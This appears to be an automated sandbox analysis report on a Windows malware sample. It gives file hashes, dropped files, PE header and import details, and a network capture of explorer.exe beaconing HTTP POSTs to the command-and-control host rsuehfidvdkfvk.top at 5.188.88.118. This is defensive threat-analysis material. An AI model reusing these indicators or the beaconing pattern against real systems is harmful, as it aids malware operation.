            SSDEEP: 12:TL1t4ufFdbXGwcFOaOndOtJRbGMNmt2SH/+eVpUHFxOUwa5q0S93BPZ75fOS:TLLJLbXaFpEO5bNmISHn06UwcQPx5fB
            MD5: 3219CA933D97DF8F5931EF68B7EEDF04
            SHA1: D79FEE14CBDE4E92447996C9FB37ADCB673B6138
            SHA-256: 21DE8DD11459659421BA1DBC554C15A3756FF1A38CC797A139D407F1F94092B4
            SHA-512: A3CFCC17612975C5630B49736F4B535555D06B23E3523E46495020B8B55B2361C4B5EF39FE649273F2D323BE0EC138707E67DC59EB719BA8EF676439491662AC
            Malicious: false
            C:\Users\user\AppData\Roaming\cveiudv
            Process:C:\Windows\explorer.exe
            File Type:data
            Category:modified
            Size (bytes):422174
            Entropy (8bit):7.9995511013879135
            Encrypted:true
            SSDEEP:12288:TCpGNN3qZTiF2HBupddNvuYke2ECsmcsKL6zzS1iyE/:GSN3qZT+2opdrvtksCsnsc18
            MD5:B13B4E1CB91F37EC7EB8E449AF7BAD81
            SHA1:7AF7D20E70B230670A90F14C5C8AC7B222A0411A
            SHA-256:F8352AC185B423B72C0F8D64C4E4AC80B6D56419CE27501DC2B5D7D26DDCEC64
            SHA-512:0E520B75F8ABA7F52B5295CDC6BD969B191A70B232B94CF9976F3A34983F5E6045A2E531FFAA03A006F8F62A9642E3E1FB84E73D47AC492C4A156F0B52078272
            Malicious:false
            C:\Users\user\AppData\Roaming\favdejf
            Process:C:\Windows\explorer.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):285184
            Entropy (8bit):5.909368896887488
            Encrypted:false
            SSDEEP:3072:80Zpf7ywrLoWHdAucQoHnSzG+dWpvgne52lPxsBvBPoeg8MRkY34R3R8UJPb9wy:RIUJcQk3+WvgnJla7oe0RdIdRzYy
            MD5:8696A4269E30DDB34A7E0E84629EDE03
            SHA1:125198E1F636EF118E468145D02E801A3FFE2A97
            SHA-256:47EC411EAB0AA15619F24CAA6256ED4CA5CFC695A26F5B71830B53B07C22B05B
            SHA-512:481AE35EC056DE3C08AE167E7B2FEA9352C82A7CD47EBBC46047270E1A0F518B3FEECE8AD6900D0A5AC5CA1B44C80DA0E916504809E93E176933931D940CAD96
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 56%
            C:\Users\user\AppData\Roaming\favdejf:Zone.Identifier
            Process:C:\Windows\explorer.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Preview: [ZoneTransfer]....ZoneId=0

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):5.909368896887488
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:1RMZ62tUAl.exe
            File size:285184
            MD5:8696a4269e30ddb34a7e0e84629ede03
            SHA1:125198e1f636ef118e468145d02e801a3ffe2a97
            SHA256:47ec411eab0aa15619f24caa6256ed4ca5cfc695a26f5b71830b53b07c22b05b
            SHA512:481ae35ec056de3c08ae167e7b2fea9352c82a7cd47ebbc46047270e1a0f518b3feece8ad6900d0a5ac5ca1b44c80da0e916504809e93e176933931d940cad96
            SSDEEP:3072:80Zpf7ywrLoWHdAucQoHnSzG+dWpvgne52lPxsBvBPoeg8MRkY34R3R8UJPb9wy:RIUJcQk3+WvgnJla7oe0RdIdRzYy
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0..'t..tt..tt..t..Wt]..t..bte..t..Vt...t}.ot...tt..t...t..Stu..t..ftu..t..atu..tRicht..t................PE..L.... l_...........

            File Icon

            Icon Hash:aecaae9ecea62aa2

            Static PE Info

            General

            Entrypoint:0x417ad0
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
            DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
            Time Stamp:0x5F6C20F2 [Thu Sep 24 04:30:42 2020 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:1
            File Version Major:5
            File Version Minor:1
            Subsystem Version Major:5
            Subsystem Version Minor:1
            Import Hash:ff6439958bc7d1b926a3ea41188420fe

            Entrypoint Preview

            Instruction
            mov edi, edi
            push ebp
            mov ebp, esp
            call 00007F3258C8E16Bh
            call 00007F3258C8DE76h
            pop ebp
            ret
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            mov edi, edi
            push ebp
            mov ebp, esp
            push FFFFFFFEh
            push 0042EF30h
            push 0041BCF0h
            mov eax, dword ptr fs:[00000000h]
            push eax
            add esp, FFFFFF98h
            push ebx
            push esi
            push edi
            mov eax, dword ptr [00431064h]
            xor dword ptr [ebp-08h], eax
            xor eax, ebp
            push eax
            lea eax, dword ptr [ebp-10h]
            mov dword ptr fs:[00000000h], eax
            mov dword ptr [ebp-18h], esp
            mov dword ptr [ebp-70h], 00000000h
            lea eax, dword ptr [ebp-60h]
            push eax
            call dword ptr [00401078h]
            cmp dword ptr [01FB4ABCh], 00000000h
            jne 00007F3258C8DE70h
            push 00000000h
            push 00000000h
            push 00000001h
            push 00000000h
            call dword ptr [00401130h]
            call 00007F3258C8DFF3h
            mov dword ptr [ebp-6Ch], eax
            call 00007F3258C91FBBh
            test eax, eax
            jne 00007F3258C8DE6Ch
            push 0000001Ch
            call 00007F3258C8DFB0h
            add esp, 04h
            call 00007F3258C91918h
            test eax, eax
            jne 00007F3258C8DE6Ch
            push 00000010h
            call 00007F3258C8DF9Dh
            add esp, 04h
            push 00000001h
            call 00007F3258C91863h
            add esp, 04h
            call 00007F3258C8F51Bh
            mov dword ptr [ebp-04h], 00000000h
            call 00007F3258C8F0FFh
            test eax, eax

            Rich Headers

            Programming Language:
            • [LNK] VS2010 build 30319
            • [ASM] VS2010 build 30319
            • [ C ] VS2010 build 30319
            • [C++] VS2010 build 30319
            • [RES] VS2010 build 30319
            • [IMP] VS2008 SP1 build 30729

            Data Directories

            Name | Virtual Address | Virtual Size | Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2f514 | 0x78 | .text
            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1bb6000 | 0x44c0 | .rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1bbb000 | 0x1698 | .reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1260 | 0x1c | .text
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x178f8 | 0x40 | .text
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x210 | .text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

            Sections

            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
            .text | 0x1000 | 0x2f18a | 0x2f200 | False | 0.615742083886 | data | 7.06143863939 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            .data | 0x31000 | 0x1b84ac0 | 0x1400 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
            .rsrc | 0x1bb6000 | 0x44c0 | 0x4600 | False | 0.707645089286 | data | 6.19981176683 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc | 0x1bbb000 | 0x10818 | 0x10a00 | False | 0.0732935855263 | data | 0.963621944631 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

            Resources

            Name | RVA | Size | Type | Language | Country
            RT_ICON | 0x1bb6240 | 0x25a8 | data | Spanish | Paraguay
            RT_ICON | 0x1bb87e8 | 0x10a8 | data | Spanish | Paraguay
            RT_STRING | 0x1bb9ac8 | 0xe2 | data | Divehi; Dhivehi; Maldivian | Maldives
            RT_STRING | 0x1bb9bb0 | 0x30a | data | Divehi; Dhivehi; Maldivian | Maldives
            RT_STRING | 0x1bb9ec0 | 0x5fa | data | Divehi; Dhivehi; Maldivian | Maldives
            RT_ACCELERATOR | 0x1bb9918 | 0x80 | data | Divehi; Dhivehi; Maldivian | Maldives
            RT_ACCELERATOR | 0x1bb98b8 | 0x60 | data | Divehi; Dhivehi; Maldivian | Maldives
            RT_GROUP_ICON | 0x1bb9890 | 0x22 | data | Spanish | Paraguay
            RT_VERSION | 0x1bb9998 | 0x12c | data | Divehi; Dhivehi; Maldivian | Maldives

            Imports

            DLL | Import
            KERNEL32.dll | SetWaitableTimer, SetDllDirectoryW, InterlockedIncrement, _lwrite, SetFirmwareEnvironmentVariableA, GetSystemWindowsDirectoryW, GetNamedPipeHandleStateA, SetHandleInformation, GetComputerNameW, GetModuleHandleW, GetTickCount, GetProcessHeap, GetConsoleAliasesLengthA, ConvertFiberToThread, ReadConsoleW, GetCompressedFileSizeW, GetSystemWow64DirectoryA, TlsSetValue, LoadLibraryW, GetConsoleMode, CopyFileW, SetVolumeMountPointA, GetVersionExW, HeapCreate, HeapValidate, GetModuleFileNameW, CreateActCtxA, GetACP, GetStartupInfoW, WritePrivateProfileStringW, VerifyVersionInfoW, FindFirstFileExA, GetLastError, IsDBCSLeadByteEx, SetLastError, lstrlenA, GetLongPathNameA, CreateNamedPipeA, CopyFileA, FindClose, GetPrivateProfileStringA, ProcessIdToSessionId, LocalAlloc, IsWow64Process, SetCurrentDirectoryW, GetVolumePathNamesForVolumeNameA, GetModuleFileNameA, SetConsoleCursorInfo, GetProcessShutdownParameters, FreeEnvironmentStringsW, WriteProfileStringW, BuildCommDCBA, VirtualProtect, CompareStringA, GetSystemRegistryQuota, ReadConsoleInputW, FileTimeToLocalFileTime, CreateWaitableTimerA, GetSystemTime, TlsFree, CommConfigDialogW, CloseHandle, CreateFileW, SetStdHandle, RaiseException, FlushFileBuffers, GetConsoleCP, BackupRead, WriteConsoleInputW, SetFilePointer, IsProcessorFeaturePresent, OutputDebugStringW, WriteConsoleW, GetCommandLineW, HeapSetInformation, SetUnhandledExceptionFilter, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, InterlockedDecrement, DecodePointer, GetProcAddress, ExitProcess, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, IsBadReadPtr, EncodePointer, TlsAlloc, TlsGetValue, WriteFile, GetOEMCP, GetCPInfo, IsValidCodePage, EnterCriticalSection, LeaveCriticalSection, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapReAlloc, HeapSize, HeapQueryInformation, HeapFree, RtlUnwind, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetStringTypeW, OutputDebugStringA
            USER32.dll | GetMessageTime, GetCaretBlinkTime, GetMenuItemID, GetMonitorInfoA, GetCursorInfo, GetListBoxInfo, GetMenuInfo, GetComboBoxInfo, GetMenuBarInfo
            GDI32.dll | GetBitmapBits
            WINHTTP.dll | WinHttpWriteData
            MSIMG32.dll | GradientFill

            Version Infos

            Description | Data
            Translations | 0x0022 0x023c

            Possible Origin

            Language of compilation system | Country where language is spoken
            Spanish | Paraguay
            Divehi; Dhivehi; Maldivian | Maldives

            Network Behavior

            Network Port Distribution

            TCP Packets

            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Nov 18, 2021 10:44:30.085329056 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.157572985 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.158026934 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.158356905 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.158390999 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.230472088 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.514741898 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.514771938 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.514784098 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.514796019 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.514861107 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.514924049 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.515110016 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.515134096 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.515153885 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.515175104 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.515198946 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.515234947 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.515511036 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.515568972 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.515619993 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.586787939 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.586843014 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.586858988 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.586874962 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.586911917 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.586945057 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.586963892 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.586986065 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.587021112 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.587018013 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.587054968 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.587084055 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.587104082 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.587117910 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.587133884 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.587153912 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.587158918 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.587161064 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.587172031 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.587186098 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.587234974 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.587275982 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.587316990 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.587344885 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.587367058 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.587399960 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.587433100 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.659010887 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659091949 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659142017 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659190893 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659193993 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.659244061 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659245014 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.659291983 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659316063 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659331083 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.659336090 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659357071 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659378052 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659380913 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.659398079 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659413099 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.659419060 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659439087 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659459114 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659461975 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.659482956 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659498930 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.659503937 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659523964 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659540892 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.659544945 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659565926 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659583092 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.659588099 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659609079 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659624100 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.659630060 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659650087 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659665108 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.659671068 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659692049 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659699917 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.659714937 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659735918 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659750938 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.659758091 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659779072 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659799099 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659800053 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.659820080 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659831047 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.659840107 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659862995 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659883976 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659888983 CET | 49749 | 80 | 192.168.2.3 | 5.188.88.118
            Nov 18, 2021 10:44:30.659905910 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3
            Nov 18, 2021 10:44:30.659929037 CET | 80 | 49749 | 5.188.88.118 | 192.168.2.3

            UDP Packets

            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Nov 18, 2021 10:44:29.788239002 CET | 64021 | 53 | 192.168.2.3 | 8.8.8.8
            Nov 18, 2021 10:44:30.080061913 CET | 53 | 64021 | 8.8.8.8 | 192.168.2.3
            Nov 18, 2021 10:44:31.239069939 CET | 60784 | 53 | 192.168.2.3 | 8.8.8.8
            Nov 18, 2021 10:44:31.259133101 CET | 53 | 60784 | 8.8.8.8 | 192.168.2.3
            Nov 18, 2021 10:44:31.753774881 CET | 51143 | 53 | 192.168.2.3 | 8.8.8.8
            Nov 18, 2021 10:44:31.775317907 CET | 53 | 51143 | 8.8.8.8 | 192.168.2.3
            Nov 18, 2021 10:44:32.049560070 CET | 56009 | 53 | 192.168.2.3 | 8.8.8.8
            Nov 18, 2021 10:44:32.075397015 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.3
            Nov 18, 2021 10:44:49.812151909 CET | 63297 | 53 | 192.168.2.3 | 8.8.8.8
            Nov 18, 2021 10:44:50.187908888 CET | 53 | 63297 | 8.8.8.8 | 192.168.2.3
            Nov 18, 2021 10:44:50.679728985 CET | 58361 | 53 | 192.168.2.3 | 8.8.8.8
            Nov 18, 2021 10:44:50.704993963 CET | 53 | 58361 | 8.8.8.8 | 192.168.2.3
            Nov 18, 2021 10:45:15.733613968 CET | 50728 | 53 | 192.168.2.3 | 8.8.8.8
            Nov 18, 2021 10:45:15.753202915 CET | 53 | 50728 | 8.8.8.8 | 192.168.2.3

            DNS Queries

            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
            Nov 18, 2021 10:44:29.788239002 CET | 192.168.2.3 | 8.8.8.8 | 0xeda6 | Standard query (0) | rsuehfidvdkfvk.top | A (IP address) | IN (0x0001)
            Nov 18, 2021 10:44:31.239069939 CET | 192.168.2.3 | 8.8.8.8 | 0x3738 | Standard query (0) | rsuehfidvdkfvk.top | A (IP address) | IN (0x0001)
            Nov 18, 2021 10:44:31.753774881 CET | 192.168.2.3 | 8.8.8.8 | 0x883d | Standard query (0) | rsuehfidvdkfvk.top | A (IP address) | IN (0x0001)
            Nov 18, 2021 10:44:32.049560070 CET | 192.168.2.3 | 8.8.8.8 | 0x7b89 | Standard query (0) | iosoftware.org | A (IP address) | IN (0x0001)
            Nov 18, 2021 10:44:49.812151909 CET | 192.168.2.3 | 8.8.8.8 | 0xbc17 | Standard query (0) | rsuehfidvdkfvk.top | A (IP address) | IN (0x0001)
            Nov 18, 2021 10:44:50.679728985 CET | 192.168.2.3 | 8.8.8.8 | 0x96a8 | Standard query (0) | iosoftware.org | A (IP address) | IN (0x0001)
            Nov 18, 2021 10:45:15.733613968 CET | 192.168.2.3 | 8.8.8.8 | 0x1536 | Standard query (0) | rsuehfidvdkfvk.top | A (IP address) | IN (0x0001)

            DNS Answers

            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
            Nov 18, 2021 10:44:30.080061913 CET | 8.8.8.8 | 192.168.2.3 | 0xeda6 | No error (0) | rsuehfidvdkfvk.top | | 5.188.88.118 | A (IP address) | IN (0x0001)
            Nov 18, 2021 10:44:31.259133101 CET | 8.8.8.8 | 192.168.2.3 | 0x3738 | No error (0) | rsuehfidvdkfvk.top | | 5.188.88.118 | A (IP address) | IN (0x0001)
            Nov 18, 2021 10:44:31.775317907 CET | 8.8.8.8 | 192.168.2.3 | 0x883d | No error (0) | rsuehfidvdkfvk.top | | 5.188.88.118 | A (IP address) | IN (0x0001)
            Nov 18, 2021 10:44:32.075397015 CET | 8.8.8.8 | 192.168.2.3 | 0x7b89 | No error (0) | iosoftware.org | | 139.60.161.75 | A (IP address) | IN (0x0001)
            Nov 18, 2021 10:44:50.187908888 CET | 8.8.8.8 | 192.168.2.3 | 0xbc17 | No error (0) | rsuehfidvdkfvk.top | | 5.188.88.118 | A (IP address) | IN (0x0001)
            Nov 18, 2021 10:44:50.704993963 CET | 8.8.8.8 | 192.168.2.3 | 0x96a8 | No error (0) | iosoftware.org | | 139.60.161.75 | A (IP address) | IN (0x0001)
            Nov 18, 2021 10:45:15.753202915 CET | 8.8.8.8 | 192.168.2.3 | 0x1536 | No error (0) | rsuehfidvdkfvk.top | | 5.188.88.118 | A (IP address) | IN (0x0001)

            HTTP Request Dependency Graph

            • oidhj.com
              • rsuehfidvdkfvk.top
            • wjigjxv.com
            • mrirybsj.net
            • tmmykkqa.org

            HTTP Packets

            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
            0 | 192.168.2.3 | 49749 | 5.188.88.118 | 80 | C:\Windows\explorer.exe
            Timestamp | kBytes transferred | Direction | Data
            Nov 18, 2021 10:44:30.158356905 CET | 1005 | OUT | POST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://oidhj.com/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 338
            Host: rsuehfidvdkfvk.top
            Nov 18, 2021 10:44:30.514741898 CET | 1007 | IN | HTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Thu, 18 Nov 2021 09:44:30 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close


            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
            1 | 192.168.2.3 | 49750 | 5.188.88.118 | 80 | C:\Windows\explorer.exe
            Timestamp | kBytes transferred | Direction | Data
            Nov 18, 2021 10:44:31.329138041 CET | 1445 | OUT | POST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://wjigjxv.com/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 247
            Host: rsuehfidvdkfvk.top
            Nov 18, 2021 10:44:31.741991043 CET | 1446               | IN        | HTTP/1.1 200 OK
            Server: nginx/1.18.0 (Ubuntu)
            Date: Thu, 18 Nov 2021 09:44:31 GMT
            Content-Type: text/html; charset=utf-8
            Content-Length: 0
            Connection: close


            Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
            2          | 192.168.2.3 | 49751       | 5.188.88.118   | 80               | C:\Windows\explorer.exe
            Timestamp                           | kBytes transferred | Direction | Data
